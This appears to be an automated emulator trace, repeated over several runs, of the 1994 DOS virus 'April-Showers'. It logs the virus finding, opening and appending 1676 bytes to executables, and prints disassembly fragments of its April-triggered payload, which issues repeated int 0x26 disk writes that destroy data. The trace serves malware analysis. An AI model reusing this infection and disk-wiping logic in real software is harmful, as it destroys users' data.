2018-12-25T12:28:49.13106864Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.133151718Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.141179768Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.151014144Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.153755351Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.160672334Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.167046065Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.169248497Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.175346016Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.180198692Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.183084906Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.185323907Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.188041564Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.196344048Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.198879086Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.200922764Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.205449263Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.209271985Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.21624396Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.223210847Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.226069571Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.236312599Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.243690765Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.248321432Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.250277937Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.253288837Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.263430522Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.265188844Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.272917918Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.283624844Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.286659528Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.293533952Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.299965832Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.302856995Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.314661313Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.321070059Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.324982223Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.32659295Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.329540801Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.339208417Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.340624136Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.348078785Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.358465559Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.360932732Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:49.364963538Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:49.367905614Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:49.369667477Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:49.372862361Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:49.3452355Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:49.347369338Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:49.350703855Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:49.357453945Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:49.36516617Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:49.368290856Z	62	PC: 12e49 | Close file
2018-12-25T12:28:49.37069436Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.373487832Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:49.380787388Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.394052565Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.401570794Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.40438368Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:49.421074224Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.428220289Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:49.431714682Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:49.433217915Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:49.436109423Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:49.446505382Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:49.448290355Z	62	PC: 12f4d | Close file
2018-12-25T12:28:49.456785062Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.469021813Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.472099777Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.479423034Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.486449631Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.488735485Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.499868733Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.507175054Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.510852981Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.512346138Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.5156281Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.526350246Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.528798133Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.537260186Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.54850725Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.551951546Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.559239965Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.567072618Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.569529796Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.580623269Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.58836812Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.59287024Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.594993132Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.599716763Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.609922738Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.611481626Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.620018345Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.631481879Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.634343745Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.641875379Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.649841231Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.652167161Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.664195578Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.672431566Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.675893415Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.678096676Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.682827884Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.694280673Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.695822146Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.704840772Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.711399462Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.713201027Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.717923565Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.725135807Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.726995854Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.731727351Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.73692286Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.739695928Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.741087555Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.744104085Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.753330377Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.75478321Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.757202366Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.761895525Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.76459654Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.771950502Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.778813189Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.780800058Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.792928962Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.800020296Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.803696995Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.805677154Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.808870766Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.81871757Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.821171616Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.829436945Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.839966611Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.843171424Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.851307926Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:49.859035573Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:49.862580346Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.87383897Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:49.878541906Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:49.880465821Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:49.881709244Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:49.883562079Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:49.889778598Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:49.891437866Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:49.899882014Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:49.911057884Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:49.914409998Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:49.9188099Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:49.921117542Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:49.923616796Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:49.92683692Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:50.076273166Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:50.083243673Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:50.086409544Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:50.092899977Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:50.100562583Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:50.103232686Z	62	PC: 12e49 | Close file
2018-12-25T12:28:50.104953467Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:50.107849944Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:50.114272071Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:50.12745313Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:50.134572351Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:50.136694301Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:50.154297345Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:50.161562478Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:50.164671387Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:50.165935333Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:50.168737301Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:50.179078298Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:50.18074376Z	62	PC: 12f4d | Close file
2018-12-25T12:28:50.327048118Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:50.513047963Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:50.516469341Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:50.524384173Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:50.657785362Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:50.66092121Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.134116675Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.143224879Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.147077955Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.14912056Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.152571642Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.169839409Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.174327074Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.189515851Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.202475028Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.207015575Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.216775045Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.228284004Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.231592967Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.24342707Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.252101738Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.256077858Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.258088636Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.261983147Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.282063613Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.283654753Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.292251486Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.303477376Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.306272516Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.313265628Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.320696306Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.322617237Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.333486045Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.341231136Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.345084515Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.346232616Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.348713325Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.354677784Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.356199569Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.365137993Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.376165131Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.380385433Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.387825673Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.395818346Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.397170461Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.401645838Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.41377308Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.416796659Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.418358591Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.42260313Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.432042535Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.434081923Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.437499064Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.443114851Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.450459545Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.458488354Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.465669004Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.467790754Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.479431985Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.487692118Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.491758592Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.493771284Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.498286162Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.508672619Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.510414246Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.51987451Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.546459176Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.55067802Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.559259363Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.567227152Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.569733023Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.581314269Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.590007381Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.593521729Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.595518262Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.600189888Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.610999006Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.613107883Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.622653379Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.63390788Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.637079059Z	59	PC: 12dd6 | Change current directory
2018-12-25T12:28:51.642986094Z	42	PC: 12f5c | Get date 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9 0x12f63: lea dx, word ptr [bp + 0x3a0] 0x12f67: int 0x21 0x12f69: mov al, 2 0x12f6b: mov cx, 0xff 0x12f6e: mov dx, 0 0x12f71: int 0x26 0x12f73: mov al, 3 0x12f75: mov cx, 0xff 0x12f78: mov dx, 0 0x12f7b: int 0x26 0x12f7d: mov al, 4 0x12f7f: mov cx, 0xff 0x12f82: mov dx, 0 0x12f85: int 0x26 0x12f87: mov al, 5 0x12f89: mov cx, 0xff 0x12f8c: mov dx, 0
2018-12-25T12:28:51.645758229Z	59	PC: 12de3 | Change current directory
2018-12-25T12:28:51.648010457Z	26	PC: 12fe5 | Set disk transfer address (See above)
2018-12-25T12:28:51.65179754Z	9	PC: 12a54 | Display string (String= ' Virii Production by a MoM Personell Virus: April-Showers Type: Appends *.Com *.Exe Created: 03-08-1994 Sets off: Every April Effect: Destroys data Size: Enlarges files by 1.6k ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10686,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:28:51.12869736Z	26	PC: 12fe5 | Set disk transfer address
2018-12-25T12:28:51.131970544Z	71	PC: 12dc0 | Get current directory
2018-12-25T12:28:51.135233977Z	78	PC: 12e2a | Find first file
2018-12-25T12:28:51.14183612Z	61	PC: 12fee | Open file (Filename = 'TEST.EXE')
2018-12-25T12:28:51.149363827Z	63	PC: 12e45 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:28:51.151971913Z	62	PC: 12e49 | Close file
2018-12-25T12:28:51.1537282Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.156587219Z	78	PC: 12e2a | Find first file (See above)
2018-12-25T12:28:51.162663025Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.172850142Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.177423723Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.179139677Z	67	PC: 12ff9 | Get or set file attributes
2018-12-25T12:28:51.19250229Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.199877134Z	64	PC: 12f1d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:28:51.205970203Z	66	PC: 12fe0 | Move file pointer
2018-12-25T12:28:51.207524622Z	44	PC: 12f28 | Get time 0x12f28: cmp dh, 0 0x12f2b: je 0x12f24 0x12f2d: mov byte ptr cs:[bp + 0x790], dh 0x12f32: call 0x133b7 0x12f35: inc byte ptr cs:[bp + 0x791] 0x12f3a: mov ax, 0x5701 0x12f3d: mov cx, word ptr cs:[bp + 0x804] 0x12f42: mov dx, word ptr cs:[bp + 0x806] 0x12f47: int 0x21 0x12f49: mov ah, 0x3e 0x12f4b: int 0x21 0x12f4d: xor cx, cx 0x12f4f: mov cl, byte ptr cs:[bp + 0x803] 0x12f54: call 0x12ff0 0x12f57: ret 0x12f58: mov ah, 0x2a 0x12f5a: int 0x21 0x12f5c: cmp dh, 4 0x12f5f: jne 0x12fd7 0x12f61: mov ah, 9
2018-12-25T12:28:51.209529053Z	64	PC: 13413 | Write file or device (Write 1676 bytes on handle 5)
2018-12-25T12:28:51.215972099Z	87	PC: 12f49 | Get or set file date and time
2018-12-25T12:28:51.217072203Z	62	PC: 12f4d | Close file
2018-12-25T12:28:51.227880871Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.239083473Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.241070269Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.24564999Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.250524144Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.251801236Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.259782856Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.272174215Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.280609764Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.282754278Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.286975573Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.305228526Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.307190016Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.316159087Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.333725435Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.338090227Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.345686265Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.353485314Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.355865145Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.368899858Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.377934041Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.382015554Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.383839243Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.387917674Z	64	PC: 13413 | Write file or device (See above)
2018-12-25T12:28:51.398948347Z	87	PC: 12f49 | Get or set file date and time (See above)
2018-12-25T12:28:51.401068082Z	62	PC: 12f4d | Close file (See above)
2018-12-25T12:28:51.410979942Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.422668164Z	79	PC: 12e2a | Find next file (See above)
2018-12-25T12:28:51.426118876Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.434629588Z	63	PC: 12e45 | Read file or device (See above)
2018-12-25T12:28:51.442552712Z	62	PC: 12e49 | Close file (See above)
2018-12-25T12:28:51.445021678Z	67	PC: 12ff9 | Get or set file attributes (See above)
2018-12-25T12:28:51.456709815Z	61	PC: 12fee | Open file (See above)
2018-12-25T12:28:51.465522816Z	64	PC: 12f1d | Write file or device (See above)
2018-12-25T12:28:51.46847446Z	66	PC: 12fe0 | Move file pointer (See above)
2018-12-25T12:28:51.470410932Z	44	PC: 12f28 | Get time (See above)
2018-12-25T12:28:51.474641884Z	64	PC: 13413 | Write file or device (See above)
